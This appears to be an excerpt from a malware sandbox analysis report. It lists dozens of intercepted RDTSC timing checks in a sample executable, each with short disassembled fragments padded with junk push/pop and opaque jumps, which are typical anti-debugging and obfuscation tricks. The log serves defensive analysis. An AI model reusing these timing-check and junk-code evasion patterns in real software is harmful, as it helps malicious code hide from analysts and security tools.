Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D95718 second address: D9572B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2C61915Bh 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D9572B second address: D9573E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2A2CEBE356h 0x0000000a push eax 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D959C5 second address: D959C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D959C9 second address: D959D8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D959D8 second address: D95A0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C619168h 0x00000007 jnl 00007F2A2C619156h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F2A2C619165h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D95B8A second address: D95BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2CEBE368h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D98017 second address: D98039 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C619163h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F2A2C619158h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D98039 second address: D9805E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE368h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D98102 second address: D98123 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jno 00007F2A2C619160h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D98123 second address: D98127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D98127 second address: D9812B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D9812B second address: D98158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F2A2CEBE365h 0x00000012 jns 00007F2A2CEBE356h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D9829A second address: D9829F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D9829F second address: D98322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F2A2CEBE358h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 sbb esi, 1DE206E0h 0x00000028 push 00000000h 0x0000002a jnc 00007F2A2CEBE35Ch 0x00000030 call 00007F2A2CEBE359h 0x00000035 jl 00007F2A2CEBE384h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f push edi 0x00000040 pop edi 0x00000041 jl 00007F2A2CEBE356h 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D98322 second address: D9832C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2A2C61915Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D98413 second address: D98434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F2A2CEBE364h 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D98434 second address: D9843A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D9843A second address: D9845D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jg 00007F2A2CEBE356h 0x0000000c pop esi 0x0000000d popad 0x0000000e nop 0x0000000f pushad 0x00000010 sub bh, 0000003Dh 0x00000013 mov ax, E711h 0x00000017 popad 0x00000018 push 00000000h 0x0000001a push 230A7F74h 0x0000001f pushad 0x00000020 push edi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D9845D second address: D984AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 popad 0x0000000a xor dword ptr [esp], 230A7FF4h 0x00000011 mov dx, 624Dh 0x00000015 push 00000003h 0x00000017 jbe 00007F2A2C61916Ch 0x0000001d jmp 00007F2A2C619166h 0x00000022 mov ecx, dword ptr [ebp+122D2543h] 0x00000028 push 00000000h 0x0000002a mov edi, 462E40C6h 0x0000002f push 00000003h 0x00000031 mov edi, dword ptr [ebp+122D2C07h] 0x00000037 push 62439CF3h 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D984AF second address: D984B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D984B3 second address: D984B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D984B7 second address: D984C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D984C0 second address: D984F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2A2C619156h 0x0000000a popad 0x0000000b popad 0x0000000c add dword ptr [esp], 5DBC630Dh 0x00000013 cld 0x00000014 lea ebx, dword ptr [ebp+12453F5Ch] 0x0000001a sub dword ptr [ebp+122D1FB9h], ebx 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 push ebx 0x00000024 jmp 00007F2A2C619160h 0x00000029 pop ebx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: DA98BA second address: DA98CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F2A2CEBE358h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push ecx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: DB9450 second address: DB9471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2A2C619168h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: DB9471 second address: DB9475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: DB9475 second address: DB9479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB72B3 second address: DB72D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2A2CEBE356h 0x0000000a popad 0x0000000b jmp 00007F2A2CEBE365h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB72D3 second address: DB72DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB72DB second address: DB72F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE361h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB72F0 second address: DB72FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB72FA second address: DB72FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB72FE second address: DB7302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB75BD second address: DB75F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2CEBE35Bh 0x00000009 pop edi 0x0000000a pushad 0x0000000b push ecx 0x0000000c jg 00007F2A2CEBE356h 0x00000012 pop ecx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jno 00007F2A2CEBE356h 0x0000001c jmp 00007F2A2CEBE362h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB75F6 second address: DB75FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB774B second address: DB775C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2A2CEBE35Ch 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB7B67 second address: DB7B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB7B6B second address: DB7B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB7B71 second address: DB7B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2A2C619169h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB7E86 second address: DB7E90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB8125 second address: DB8142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F2A2C619156h 0x0000000f jmp 00007F2A2C61915Eh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB8142 second address: DB8146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB8146 second address: DB815F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2A2C61915Eh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB815F second address: DB8188 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE367h 0x00000007 jmp 00007F2A2CEBE35Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB8188 second address: DB8198 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 ja 00007F2A2C619156h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB8198 second address: DB819C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB819C second address: DB81A2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB8595 second address: DB85A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2CEBE35Ch 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB85A6 second address: DB85C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2A2C61915Fh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f jnp 00007F2A2C619156h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB8D6A second address: DB8D77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB8D77 second address: DB8D90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2A2C619164h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB8ECD second address: DB8F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F2A2CEBE364h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 jmp 00007F2A2CEBE367h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB9335 second address: DB933F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2A2C619156h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB933F second address: DB9343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DBEB2E second address: DBEB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a je 00007F2A2C61915Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DBF2F7 second address: DBF2FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC0537 second address: DC053D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC053D second address: DC0542 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC4D90 second address: DC4D94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC4D94 second address: DC4DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC4DA0 second address: DC4DA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC4DA4 second address: DC4DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2A2CEBE356h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC4DB4 second address: DC4DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2C61915Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D86359 second address: D8635E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D8635E second address: D86376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F2A2C619163h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC41E9 second address: DC41ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC41ED second address: DC41F7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2A2C619156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC4607 second address: DC460D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC460D second address: DC4612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC48EA second address: DC490A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2CEBE367h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC490A second address: DC4910 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC4910 second address: DC4929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2A2CEBE360h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC6D81 second address: DC6DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jns 00007F2A2C619156h 0x00000011 popad 0x00000012 pop edx 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 jmp 00007F2A2C61915Fh 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC6F6B second address: DC6F71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC6F71 second address: DC6F84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A2C61915Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC7C24 second address: DC7C2A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC80C3 second address: DC80C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC865A second address: DC865E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DCA86C second address: DCA870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DCA870 second address: DCA87E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F2A2CEBE356h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DCB5E4 second address: DCB5EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DCC104 second address: DCC18B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE35Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2A2CEBE369h 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 sub dword ptr [ebp+122D1854h], esi 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F2A2CEBE358h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 push 00000000h 0x00000036 jmp 00007F2A2CEBE367h 0x0000003b call 00007F2A2CEBE35Eh 0x00000040 mov di, si 0x00000043 pop edi 0x00000044 xchg eax, ebx 0x00000045 pushad 0x00000046 pushad 0x00000047 pushad 0x00000048 popad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DCEABD second address: DCEAC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DCEAC4 second address: DCEACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F2A2CEBE356h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DCEACE second address: DCEAEF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2A2C619166h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DCEAEF second address: DCEAF4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
